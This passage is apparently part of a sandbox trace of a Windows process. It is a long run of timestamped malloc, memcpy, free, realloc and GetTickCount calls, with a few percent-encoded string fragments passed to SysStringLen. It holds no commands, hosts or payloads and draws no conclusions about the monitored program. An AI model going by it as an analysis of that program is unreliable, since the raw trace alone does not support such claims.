_Dst=0x24adf9b85e8, _Src=0x24adf9b8178, _Size=0x2 | out: _Dst=0x24adf9b85e8) returned 0x24adf9b85e8 [0100.172] free (_Block=0x24ae14807d0) [0100.172] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="¯", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0100.173] malloc (_Size=0x970) returned 0x24ae1485100 [0100.173] memcpy (in: _Dst=0x24adf9b8d98, _Src=0xd6788fbb30, _Size=0x6 | out: _Dst=0x24adf9b8d98) returned 0x24adf9b8d98 [0100.173] malloc (_Size=0x28) returned 0x24ae1480aa0 [0100.173] memcpy (in: _Dst=0x24adf9b888e, _Src=0x24ae1a0f684, _Size=0xc | out: _Dst=0x24adf9b888e) returned 0x24adf9b888e [0100.173] memcpy (in: _Dst=0x24adf9b8888, _Src=0x24adf9b8d98, _Size=0x6 | out: _Dst=0x24adf9b8888) returned 0x24adf9b8888 [0100.174] free (_Block=0x24ae1480aa0) [0100.175] malloc (_Size=0x28) returned 0x24ae1480aa0 [0100.175] malloc (_Size=0x28) returned 0x24ae14807d0 [0100.175] malloc (_Size=0x28) returned 0x24ae1480b00 [0100.176] memcpy (in: _Dst=0x24adf9b864e, _Src=0x24adf9b8c38, _Size=0x2 | out: _Dst=0x24adf9b864e) returned 0x24adf9b864e [0100.176] memcpy (in: _Dst=0x24adf9b864c, _Src=0x24adf9b8d78, _Size=0x2 | out: _Dst=0x24adf9b864c) returned 0x24adf9b864c [0100.176] memcpy (in: _Dst=0x24adf9b864a, _Src=0x24adf9b8c78, _Size=0x2 | out: _Dst=0x24adf9b864a) returned 0x24adf9b864a [0100.176] memcpy (in: _Dst=0x24adf9b8648, _Src=0x24adf9b8cd8, _Size=0x2 | out: _Dst=0x24adf9b8648) returned 0x24adf9b8648 [0100.177] free (_Block=0x24ae1480b00) [0100.177] GetTickCount () returned 0x210d0a5 [0100.177] memcpy (in: _Dst=0x24adf9b9158, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b9158) returned 0x24adf9b9158 [0100.177] malloc (_Size=0x28) returned 0x24ae1480b00 [0100.177] memcpy (in: _Dst=0x24adf9b849c, _Src=0x24adf9b9158, _Size=0x4 | out: _Dst=0x24adf9b849c) returned 0x24adf9b849c [0100.177] memcpy (in: _Dst=0x24adf9b8498, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b8498) returned 0x24adf9b8498 [0100.178] free (_Block=0x24ae1480b00) [0100.178] memcpy (in: _Dst=0x24adf9b9118, _Src=0x24adf9b849c, _Size=0x4 | out: _Dst=0x24adf9b9118) returned 0x24adf9b9118 [0100.178] malloc (_Size=0x28) returned 0x24ae1480b00 [0100.178] memcpy (in: _Dst=0x24adf9b9238, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b9238) returned 0x24adf9b9238 [0100.178] malloc (_Size=0x28) returned 0x24ae148b040 [0100.179] memcpy (in: _Dst=0x24adf9b855c, _Src=0x24adf9b9238, _Size=0x4 | out: _Dst=0x24adf9b855c) returned 0x24adf9b855c [0100.179] memcpy (in: _Dst=0x24adf9b8558, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b8558) returned 0x24adf9b8558 [0100.179] free (_Block=0x24ae148b040) [0100.179] memcpy (in: _Dst=0x24adf9b9078, _Src=0x24adf9b855c, _Size=0x4 | out: _Dst=0x24adf9b9078) returned 0x24adf9b9078 [0100.179] malloc (_Size=0x28) returned 0x24ae148b100 [0100.180] malloc (_Size=0x28) returned 0x24ae148b010 [0100.180] memcpy (in: _Dst=0x24adf9b9258, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b9258) returned 0x24adf9b9258 [0100.180] malloc (_Size=0x28) returned 0x24ae148b190 [0100.180] memcpy (in: _Dst=0x24adf9b861c, _Src=0x24adf9b9258, _Size=0x4 | out: _Dst=0x24adf9b861c) returned 0x24adf9b861c [0100.180] memcpy (in: _Dst=0x24adf9b8618, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b8618) returned 0x24adf9b8618 [0100.181] free (_Block=0x24ae148b190) [0100.181] memcpy (in: _Dst=0x24adf9b9058, _Src=0x24adf9b861c, _Size=0x4 | out: _Dst=0x24adf9b9058) returned 0x24adf9b9058 [0100.181] malloc (_Size=0x28) returned 0x24ae148b0d0 [0100.181] malloc (_Size=0x28) returned 0x24ae148af20 [0100.182] memcpy (in: _Dst=0x24adf9b8e58, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b8e58) returned 0x24adf9b8e58 [0100.182] malloc (_Size=0x28) returned 0x24ae148b130 [0100.182] memcpy (in: _Dst=0x24adf9b89dc, _Src=0x24adf9b8e58, _Size=0x4 | out: _Dst=0x24adf9b89dc) returned 0x24adf9b89dc [0100.182] memcpy (in: _Dst=0x24adf9b89d8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b89d8) returned 0x24adf9b89d8 [0100.183] free (_Block=0x24ae148b130) [0100.183] memcpy (in: _Dst=0x24adf9b8d58, _Src=0x24adf9b89dc, _Size=0x4 | out: _Dst=0x24adf9b8d58) returned 0x24adf9b8d58 [0100.183] malloc (_Size=0x28) returned 0x24ae148b040 [0100.183] malloc (_Size=0x28) returned 0x24ae148b070 [0100.183] memcpy (in: _Dst=0x24adf9a563c, _Src=0x24adf9b8d58, _Size=0x4 | out: _Dst=0x24adf9a563c) returned 0x24adf9a563c [0100.183] memcpy (in: _Dst=0x24adf9a563a, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a563a) returned 0x24adf9a563a [0100.183] memcpy (in: _Dst=0x24adf9a5636, _Src=0x24adf9b9058, _Size=0x4 | out: _Dst=0x24adf9a5636) returned 0x24adf9a5636 [0100.183] memcpy (in: _Dst=0x24adf9a5634, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5634) returned 0x24adf9a5634 [0100.183] memcpy (in: _Dst=0x24adf9a5630, _Src=0x24adf9b9078, _Size=0x4 | out: _Dst=0x24adf9a5630) returned 0x24adf9a5630 [0100.183] memcpy (in: _Dst=0x24adf9a562e, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a562e) returned 0x24adf9a562e [0100.184] memcpy (in: _Dst=0x24adf9a562a, _Src=0x24adf9b9118, _Size=0x4 | out: _Dst=0x24adf9a562a) returned 0x24adf9a562a [0100.184] memcpy (in: _Dst=0x24adf9a5628, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5628) returned 0x24adf9a5628 [0100.184] free (_Block=0x24ae148b070) [0100.184] SysStringLen (param_1="%57%61%72%72") returned 0xc [0100.184] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae1483ab0 [0100.185] memcpy (in: _Dst=0x24adf9b8ac8, _Src=0x24ae1483ab0, _Size=0x8 | out: _Dst=0x24adf9b8ac8) returned 0x24adf9b8ac8 [0100.185] free (_Block=0x24ae1483ab0) [0100.186] memcpy (in: _Dst=0x24adf9b8dd8, _Src=0xd6788fbb30, _Size=0x6 | out: _Dst=0x24adf9b8dd8) returned 0x24adf9b8dd8 [0100.186] malloc (_Size=0x28) returned 0x24ae148b070 [0100.186] memcpy (in: _Dst=0x24adf9b867e, _Src=0x24ae1a0f684, _Size=0xc | out: _Dst=0x24adf9b867e) returned 0x24adf9b867e [0100.186] memcpy (in: _Dst=0x24adf9b8678, _Src=0x24adf9b8dd8, _Size=0x6 | out: _Dst=0x24adf9b8678) returned 0x24adf9b8678 [0100.187] free (_Block=0x24ae148b070) [0100.188] malloc (_Size=0x28) returned 0x24ae148ac20 [0100.188] malloc (_Size=0x28) returned 0x24ae148b070 [0100.189] malloc (_Size=0x28) returned 0x24ae148ac80 [0100.189] malloc (_Size=0x28) returned 0x24ae148b130 [0100.189] memcpy (in: _Dst=0x24adf9b88c0, _Src=0x24adf9b8eb8, _Size=0x2 | out: _Dst=0x24adf9b88c0) returned 0x24adf9b88c0 [0100.189] memcpy (in: _Dst=0x24adf9b88be, _Src=0x24adf9b9098, _Size=0x2 | out: _Dst=0x24adf9b88be) returned 0x24adf9b88be [0100.189] memcpy (in: _Dst=0x24adf9b88bc, _Src=0x24adf9b8e78, _Size=0x2 | out: _Dst=0x24adf9b88bc) returned 0x24adf9b88bc [0100.190] memcpy (in: _Dst=0x24adf9b88ba, _Src=0x24adf9b9318, _Size=0x2 | out: _Dst=0x24adf9b88ba) returned 0x24adf9b88ba [0100.190] memcpy (in: _Dst=0x24adf9b88b8, _Src=0x24adf9b9338, _Size=0x2 | out: _Dst=0x24adf9b88b8) returned 0x24adf9b88b8 [0100.190] free (_Block=0x24ae148b130) [0100.190] memcpy (in: _Dst=0x24adf9b92d8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b92d8) returned 0x24adf9b92d8 [0100.190] malloc (_Size=0x28) returned 0x24ae148ab90 [0100.190] memcpy (in: _Dst=0x24adf9b86ac, _Src=0x24adf9b92d8, _Size=0x4 | out: _Dst=0x24adf9b86ac) returned 0x24adf9b86ac [0100.191] memcpy (in: _Dst=0x24adf9b86a8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b86a8) returned 0x24adf9b86a8 [0100.191] free (_Block=0x24ae148ab90) [0100.191] memcpy (in: _Dst=0x24adf9b9018, _Src=0x24adf9b86ac, _Size=0x4 | out: _Dst=0x24adf9b9018) returned 0x24adf9b9018 [0100.191] malloc (_Size=0x28) returned 0x24ae148afe0 [0100.191] memcpy (in: _Dst=0x24adf9b8cb8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b8cb8) returned 0x24adf9b8cb8 [0100.191] malloc (_Size=0x28) returned 0x24ae148b280 [0100.192] memcpy (in: _Dst=0x24adf9b8a6c, _Src=0x24adf9b8cb8, _Size=0x4 | out: _Dst=0x24adf9b8a6c) returned 0x24adf9b8a6c [0100.192] memcpy (in: _Dst=0x24adf9b8a68, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b8a68) returned 0x24adf9b8a68 [0100.192] free (_Block=0x24ae148b280) [0100.192] memcpy (in: _Dst=0x24adf9b90b8, _Src=0x24adf9b8a6c, _Size=0x4 | out: _Dst=0x24adf9b90b8) returned 0x24adf9b90b8 [0100.193] malloc (_Size=0x28) returned 0x24ae148aec0 [0100.193] malloc (_Size=0x28) returned 0x24ae148b1c0 [0100.193] memcpy (in: _Dst=0x24adf9b8c98, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b8c98) returned 0x24adf9b8c98 [0100.193] malloc (_Size=0x28) returned 0x24ae148b250 [0100.193] memcpy (in: _Dst=0x24adf9b8b2c, _Src=0x24adf9b8c98, _Size=0x4 | out: _Dst=0x24adf9b8b2c) returned 0x24adf9b8b2c [0100.193] memcpy (in: _Dst=0x24adf9b8b28, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b8b28) returned 0x24adf9b8b28 [0100.194] free (_Block=0x24ae148b250) [0100.194] memcpy (in: _Dst=0x24adf9b8df8, _Src=0x24adf9b8b2c, _Size=0x4 | out: _Dst=0x24adf9b8df8) returned 0x24adf9b8df8 [0100.194] malloc (_Size=0x28) returned 0x24ae148b250 [0100.194] malloc (_Size=0x28) returned 0x24ae148abc0 [0100.194] malloc (_Size=0x970) returned 0x24ae148b350 [0100.194] memcpy (in: _Dst=0x24adf9b8ff8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b8ff8) returned 0x24adf9b8ff8 [0100.194] malloc (_Size=0x28) returned 0x24ae148ab90 [0100.195] memcpy (in: _Dst=0x24adf9b894c, _Src=0x24adf9b8ff8, _Size=0x4 | out: _Dst=0x24adf9b894c) returned 0x24adf9b894c [0100.195] memcpy (in: _Dst=0x24adf9b8948, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b8948) returned 0x24adf9b8948 [0100.195] free (_Block=0x24ae148ab90) [0100.195] memcpy (in: _Dst=0x24adf9b8f38, _Src=0x24adf9b894c, _Size=0x4 | out: _Dst=0x24adf9b8f38) returned 0x24adf9b8f38 [0100.195] malloc (_Size=0x28) returned 0x24ae148af50 [0100.195] malloc (_Size=0x28) returned 0x24ae148ad70 [0100.195] GetTickCount () returned 0x210d0b5 [0100.196] memcpy (in: _Dst=0x24adf9b8e18, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b8e18) returned 0x24adf9b8e18 [0100.196] malloc (_Size=0x28) returned 0x24ae148b310 [0100.196] memcpy (in: _Dst=0x24adf9b840c, _Src=0x24adf9b8e18, _Size=0x4 | out: _Dst=0x24adf9b840c) returned 0x24adf9b840c [0100.196] memcpy (in: _Dst=0x24adf9b8408, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b8408) returned 0x24adf9b8408 [0100.197] free (_Block=0x24ae148b310) [0100.197] memcpy (in: _Dst=0x24adf9b90d8, _Src=0x24adf9b840c, _Size=0x4 | out: _Dst=0x24adf9b90d8) returned 0x24adf9b90d8 [0100.197] malloc (_Size=0x28) returned 0x24ae148b0a0 [0100.197] malloc (_Size=0x28) returned 0x24ae148b310 [0100.197] memcpy (in: _Dst=0x24adf9a56c2, _Src=0x24adf9b90d8, _Size=0x4 | out: _Dst=0x24adf9a56c2) returned 0x24adf9a56c2 [0100.197] memcpy (in: _Dst=0x24adf9a56c0, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a56c0) returned 0x24adf9a56c0 [0100.197] memcpy (in: _Dst=0x24adf9a56bc, _Src=0x24adf9b8f38, _Size=0x4 | out: _Dst=0x24adf9a56bc) returned 0x24adf9a56bc [0100.197] memcpy (in: _Dst=0x24adf9a56ba, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a56ba) returned 0x24adf9a56ba [0100.197] memcpy (in: _Dst=0x24adf9a56b6, _Src=0x24adf9b8df8, _Size=0x4 | out: _Dst=0x24adf9a56b6) returned 0x24adf9a56b6 [0100.197] memcpy (in: _Dst=0x24adf9a56b4, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a56b4) returned 0x24adf9a56b4 [0100.197] memcpy (in: _Dst=0x24adf9a56b0, _Src=0x24adf9b90b8, _Size=0x4 | out: _Dst=0x24adf9a56b0) returned 0x24adf9a56b0 [0100.197] memcpy (in: _Dst=0x24adf9a56ae, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a56ae) returned 0x24adf9a56ae [0100.198] memcpy (in: _Dst=0x24adf9a56aa, _Src=0x24adf9b9018, _Size=0x4 | out: _Dst=0x24adf9a56aa) returned 0x24adf9a56aa [0100.198] memcpy (in: _Dst=0x24adf9a56a8, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a56a8) returned 0x24adf9a56a8 [0100.198] free (_Block=0x24ae148b310) [0100.198] SysStringLen (param_1="%1d%c2%9d%45%4b") returned 0xf [0100.198] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae1483ab0 [0100.199] memcpy (in: _Dst=0x24adf9b8a98, _Src=0x24ae1483ab0, _Size=0x8 | out: _Dst=0x24adf9b8a98) returned 0x24adf9b8a98 [0100.199] free (_Block=0x24ae1483ab0) [0100.200] memcpy (in: _Dst=0x24adf9b8cf8, _Src=0xd6788fbb30, _Size=0x6 | out: _Dst=0x24adf9b8cf8) returned 0x24adf9b8cf8 [0100.200] malloc (_Size=0x28) returned 0x24ae148b220 [0100.200] memcpy (in: _Dst=0x24adf9b876e, _Src=0x24ae1a0f684, _Size=0xc | out: _Dst=0x24adf9b876e) returned 0x24adf9b876e [0100.200] memcpy (in: _Dst=0x24adf9b8768, _Src=0x24adf9b8cf8, _Size=0x6 | out: _Dst=0x24adf9b8768) returned 0x24adf9b8768 [0100.200] free (_Block=0x24ae148b220) [0100.200] malloc (_Size=0x70) returned 0x24ae1470320 [0100.201] malloc (_Size=0x28) returned 0x24ae148ac50 [0100.201] malloc (_Size=0x28) returned 0x24ae148ae00 [0100.201] memcpy (in: _Dst=0x24adf9b8d3c, _Src=0x24adf9b8e38, _Size=0x2 | out: _Dst=0x24adf9b8d3c) returned 0x24adf9b8d3c [0100.201] memcpy (in: _Dst=0x24adf9b8d3a, _Src=0x24adf9b8d18, _Size=0x2 | out: _Dst=0x24adf9b8d3a) returned 0x24adf9b8d3a [0100.201] memcpy (in: _Dst=0x24adf9b8d38, _Src=0x24adf9b8ef8, _Size=0x2 | out: _Dst=0x24adf9b8d38) returned 0x24adf9b8d38 [0100.202] free (_Block=0x24ae148ae00) [0100.202] memcpy (in: _Dst=0x24adf9b91b8, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9b91b8) returned 0x24adf9b91b8 [0100.202] malloc (_Size=0x28) returned 0x24ae148acb0 [0100.203] memcpy (in: _Dst=0x24adf9b8afc, _Src=0x24adf9b91b8, _Size=0x4 | out: _Dst=0x24adf9b8afc) returned 0x24adf9b8afc [0100.203] memcpy (in: _Dst=0x24adf9b8af8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b8af8) returned 0x24adf9b8af8 [0100.203] free (_Block=0x24ae148acb0) [0100.203] memcpy (in: _Dst=0x24adf9b8ed8, _Src=0x24adf9b8afc, _Size=0x4 | out: _Dst=0x24adf9b8ed8) returned 0x24adf9b8ed8 [0100.203] malloc (_Size=0x28) returned 0x24ae148ae90 [0100.204] memcpy (in: _Dst=0x24adf9b8f18, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9b8f18) returned 0x24adf9b8f18 [0100.204] malloc (_Size=0x28) returned 0x24ae148b190 [0100.204] memcpy (in: _Dst=0x24adf9b879c, _Src=0x24adf9b8f18, _Size=0x4 | out: _Dst=0x24adf9b879c) returned 0x24adf9b879c [0100.204] memcpy (in: _Dst=0x24adf9b8798, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b8798) returned 0x24adf9b8798 [0100.204] free (_Block=0x24ae148b190) [0100.204] memcpy (in: _Dst=0x24adf9b9378, _Src=0x24adf9b879c, _Size=0x4 | out: _Dst=0x24adf9b9378) returned 0x24adf9b9378 [0100.204] malloc (_Size=0x28) returned 0x24ae148abf0 [0100.204] malloc (_Size=0x28) returned 0x24ae148acb0 [0100.205] memcpy (in: _Dst=0x24adf9b8f58, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9b8f58) returned 0x24adf9b8f58 [0100.205] malloc (_Size=0x28) returned 0x24ae148b130 [0100.205] memcpy (in: _Dst=0x24adf9b8a0c, _Src=0x24adf9b8f58, _Size=0x4 | out: _Dst=0x24adf9b8a0c) returned 0x24adf9b8a0c [0100.205] memcpy (in: _Dst=0x24adf9b8a08, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b8a08) returned 0x24adf9b8a08 [0100.205] free (_Block=0x24ae148b130) [0100.205] memcpy (in: _Dst=0x24adf9b8fb8, _Src=0x24adf9b8a0c, _Size=0x4 | out: _Dst=0x24adf9b8fb8) returned 0x24adf9b8fb8 [0100.205] malloc (_Size=0x28) returned 0x24ae148b2b0 [0100.206] malloc (_Size=0x28) returned 0x24ae148aef0 [0100.207] memcpy (in: _Dst=0x24adf9b8b66, _Src=0x24adf9b8fb8, _Size=0x4 | out: _Dst=0x24adf9b8b66) returned 0x24adf9b8b66 [0100.207] memcpy (in: _Dst=0x24adf9b8b64, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9b8b64) returned 0x24adf9b8b64 [0100.208] memcpy (in: _Dst=0x24adf9b8b60, _Src=0x24adf9b9378, _Size=0x4 | out: _Dst=0x24adf9b8b60) returned 0x24adf9b8b60 [0100.208] memcpy (in: _Dst=0x24adf9b8b5e, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9b8b5e) returned 0x24adf9b8b5e [0100.208] memcpy (in: _Dst=0x24adf9b8b5a, _Src=0x24adf9b8ed8, _Size=0x4 | out: _Dst=0x24adf9b8b5a) returned 0x24adf9b8b5a [0100.208] memcpy (in: _Dst=0x24adf9b8b58, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9b8b58) returned 0x24adf9b8b58 [0100.208] free (_Block=0x24ae148aef0) [0100.208] SysStringLen (param_1="%6f%6e%73") returned 0x9 [0100.208] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae1483ab0 [0100.209] memcpy (in: _Dst=0x24adf9b9038, _Src=0x24ae1483ab0, _Size=0x6 | out: _Dst=0x24adf9b9038) returned 0x24adf9b9038 [0100.209] free (_Block=0x24ae1483ab0) [0100.209] malloc (_Size=0x2e0) returned 0x24ae14841e0 [0100.209] malloc (_Size=0x20) returned 0x24ae148b130 [0100.209] malloc (_Size=0x288) returned 0x24ae148bcd0 [0100.209] realloc (_Block=0x0, _Size=0x140) returned 0x24ae14844d0 [0100.209] GetTickCount () returned 0x210d0c5 [0100.209] realloc (_Block=0x24ae148b130, _Size=0x40) returned 0x24ae1485a80 [0100.209] realloc (_Block=0x24ae14844d0, _Size=0x280) returned 0x24ae148bf60 [0100.209] malloc (_Size=0x508) returned 0x24ae148c1f0 [0100.210] GetTickCount () returned 0x210d0c5 [0100.210] realloc (_Block=0x24ae1485a80, _Size=0x80) returned 0x24ae1485a80 [0100.210] GetTickCount () returned 0x210d0c5 [0100.210] realloc (_Block=0x24ae148bf60, _Size=0x500) returned 0x24ae148c700 [0100.210] GetTickCount () returned 0x210d0c5 [0100.210] malloc (_Size=0xa08) returned 0x24ae148cc10 [0100.210] GetTickCount () returned 0x210d0c5 [0100.210] realloc (_Block=0x24ae1485a80, _Size=0x100) returned 0x24ae14844d0 [0100.210] GetTickCount () returned 0x210d0c5 [0100.210] GetTickCount () returned 0x210d0c5 [0100.210] realloc (_Block=0x24ae148c700, _Size=0xa00) returned 0x24ae148d620 [0100.211] GetTickCount () returned 0x210d0c5 [0100.211] GetTickCount () returned 0x210d0c5 [0100.211] GetTickCount () returned 0x210d0c5 [0100.211] malloc (_Size=0x1408) returned 0x24ae1390080 [0100.212] GetTickCount () returned 0x210d0c5 [0100.212] realloc (_Block=0x24ae14844d0, _Size=0x200) returned 0x24ae14844d0 [0100.212] GetTickCount () returned 0x210d0c5 [0100.212] GetTickCount () returned 0x210d0c5 [0100.212] GetTickCount () returned 0x210d0c5 [0100.212] realloc (_Block=0x24ae148d620, _Size=0x1400) returned 0x24ae148d620 [0100.212] GetTickCount () returned 0x210d0c5 [0100.213] GetTickCount () returned 0x210d0c5 [0100.213] GetTickCount () returned 0x210d0c5 [0100.213] GetTickCount () returned 0x210d0c5 [0100.213] GetTickCount () returned 0x210d0c5 [0100.213] GetTickCount () returned 0x210d0c5 [0100.213] GetTickCount () returned 0x210d0c5 [0100.213] GetTickCount () returned 0x210d0c5 [0100.213] malloc (_Size=0x2808) returned 0x24ae1391490 [0100.213] GetTickCount () returned 0x210d0c5 [0100.214] GetTickCount () returned 0x210d0c5 [0100.217] GetTickCount () returned 0x210d0c5 [0100.219] GetTickCount () returned 0x210d0c5 [0100.252] GetTickCount () returned 0x210d0e4 [0100.258] GetTickCount () returned 0x210d0f4 [0100.260] GetTickCount () returned 0x210d0f4 [0100.262] GetTickCount () returned 0x210d0f4 [0100.264] GetTickCount () returned 0x210d0f4 [0100.266] GetTickCount () returned 0x210d0f4 [0100.269] GetTickCount () returned 0x210d103 [0100.272] GetTickCount () returned 0x210d103 [0100.274] GetTickCount () returned 0x210d103 [0100.275] malloc (_Size=0x28) returned 0x24ae148b190 [0100.275] malloc (_Size=0x28) returned 0x24ae148ace0 [0100.276] memcpy (in: _Dst=0x24adf9b998c, _Src=0x24adf9b8f98, _Size=0x2 | out: _Dst=0x24adf9b998c) returned 0x24adf9b998c [0100.276] memcpy (in: _Dst=0x24adf9b998a, _Src=0x24adf9b8f78, _Size=0x2 | out: _Dst=0x24adf9b998a) returned 0x24adf9b998a [0100.276] memcpy (in: _Dst=0x24adf9b9988, _Src=0x24adf9b91d8, _Size=0x2 | out: _Dst=0x24adf9b9988) returned 0x24adf9b9988 [0100.277] free (_Block=0x24ae148ace0) [0100.277] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x98", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0100.277] memcpy (in: _Dst=0x24adf9b94c8, _Src=0xd6788fbb30, _Size=0x6 | out: _Dst=0x24adf9b94c8) returned 0x24adf9b94c8 [0100.277] malloc (_Size=0x28) returned 0x24ae148ace0 [0100.278] memcpy (in: _Dst=0x24adf9b885e, _Src=0x24ae1a0f684, _Size=0xc | out: _Dst=0x24adf9b885e) returned 0x24adf9b885e [0100.278] memcpy (in: _Dst=0x24adf9b8858, _Src=0x24adf9b94c8, _Size=0x6 | out: _Dst=0x24adf9b8858) returned 0x24adf9b8858 [0100.279] free (_Block=0x24ae148ace0) [0100.279] malloc (_Size=0x28) returned 0x24ae148b130 [0100.280] malloc (_Size=0x28) returned 0x24ae148ace0 [0100.280] malloc (_Size=0x28) returned 0x24ae148b160 [0100.280] memcpy (in: _Dst=0x24adf9b87ce, _Src=0x24adf9b9808, _Size=0x2 | out: _Dst=0x24adf9b87ce) returned 0x24adf9b87ce [0100.280] memcpy (in: _Dst=0x24adf9b87cc, _Src=0x24adf9b9828, _Size=0x2 | out: _Dst=0x24adf9b87cc) returned 0x24adf9b87cc [0100.280] memcpy (in: _Dst=0x24adf9b87ca, _Src=0x24adf9b9648, _Size=0x2 | out: _Dst=0x24adf9b87ca) returned 0x24adf9b87ca [0100.280] memcpy (in: _Dst=0x24adf9b87c8, _Src=0x24adf9b9b08, _Size=0x2 | out: _Dst=0x24adf9b87c8) returned 0x24adf9b87c8 [0100.281] free (_Block=0x24ae148b160) [0100.281] memcpy (in: _Dst=0x24adf9b9468, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b9468) returned 0x24adf9b9468 [0100.281] malloc (_Size=0x28) returned 0x24ae148b1f0 [0100.281] memcpy (in: _Dst=0x24adf9b843c, _Src=0x24adf9b9468, _Size=0x4 | out: _Dst=0x24adf9b843c) returned 0x24adf9b843c [0100.281] memcpy (in: _Dst=0x24adf9b8438, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b8438) returned 0x24adf9b8438 [0100.282] free (_Block=0x24ae148b1f0) [0100.282] memcpy (in: _Dst=0x24adf9b9568, _Src=0x24adf9b843c, _Size=0x4 | out: _Dst=0x24adf9b9568) returned 0x24adf9b9568 [0100.282] malloc (_Size=0x28) returned 0x24ae148b1f0 [0100.282] malloc (_Size=0x970) returned 0x24ae1393ca0 [0100.282] memcpy (in: _Dst=0x24adf9b96c8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b96c8) returned 0x24adf9b96c8 [0100.282] malloc (_Size=0x28) returned 0x24ae148ae00 [0100.282] memcpy (in: _Dst=0x24adf9b858c, _Src=0x24adf9b96c8, _Size=0x4 | out: _Dst=0x24adf9b858c) returned 0x24adf9b858c [0100.282] memcpy (in: _Dst=0x24adf9b8588, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b8588) returned 0x24adf9b8588 [0100.284] free (_Block=0x24ae148ae00) [0100.284] memcpy (in: _Dst=0x24adf9b9868, _Src=0x24adf9b858c, _Size=0x4 | out: _Dst=0x24adf9b9868) returned 0x24adf9b9868 [0100.284] malloc (_Size=0x28) returned 0x24ae148ad40 [0100.284] malloc (_Size=0x28) returned 0x24ae148ad10 [0100.284] GetTickCount () returned 0x210d113 [0100.284] memcpy (in: _Dst=0x24adf9b9b88, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b9b88) returned 0x24adf9b9b88 [0100.285] malloc (_Size=0x28) returned 0x24ae148ada0 [0100.285] memcpy (in: _Dst=0x24adf9b85bc, _Src=0x24adf9b9b88, _Size=0x4 | out: _Dst=0x24adf9b85bc) returned 0x24adf9b85bc [0100.285] memcpy (in: _Dst=0x24adf9b85b8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b85b8) returned 0x24adf9b85b8 [0100.285] free (_Block=0x24ae148ada0) [0100.285] memcpy (in: _Dst=0x24adf9b94e8, _Src=0x24adf9b85bc, _Size=0x4 | out: _Dst=0x24adf9b94e8) returned 0x24adf9b94e8 [0100.286] malloc (_Size=0x28) returned 0x24ae148b160 [0100.286] malloc (_Size=0x28) returned 0x24ae148ada0 [0100.286] memcpy (in: _Dst=0x24adf9b97e8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b97e8) returned 0x24adf9b97e8 [0100.286] malloc (_Size=0x28) returned 0x24ae148b220 [0100.286] memcpy (in: _Dst=0x24adf9b9c9c, _Src=0x24adf9b97e8, _Size=0x4 | out: _Dst=0x24adf9b9c9c) returned 0x24adf9b9c9c [0100.286] memcpy (in: _Dst=0x24adf9b9c98, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b9c98) returned 0x24adf9b9c98 [0100.287] free (_Block=0x24ae148b220) [0100.287] memcpy (in: _Dst=0x24adf9b9ac8, _Src=0x24adf9b9c9c, _Size=0x4 | out: _Dst=0x24adf9b9ac8) returned 0x24adf9b9ac8 [0100.287] malloc (_Size=0x28) returned 0x24ae148b220 [0100.287] malloc (_Size=0x28) returned 0x24ae148add0 [0100.287] memcpy (in: _Dst=0x24adf9a5d7c, _Src=0x24adf9b9ac8, _Size=0x4 | out: _Dst=0x24adf9a5d7c) returned 0x24adf9a5d7c [0100.287] memcpy (in: _Dst=0x24adf9a5d7a, _Src=0x24ae1a05700, 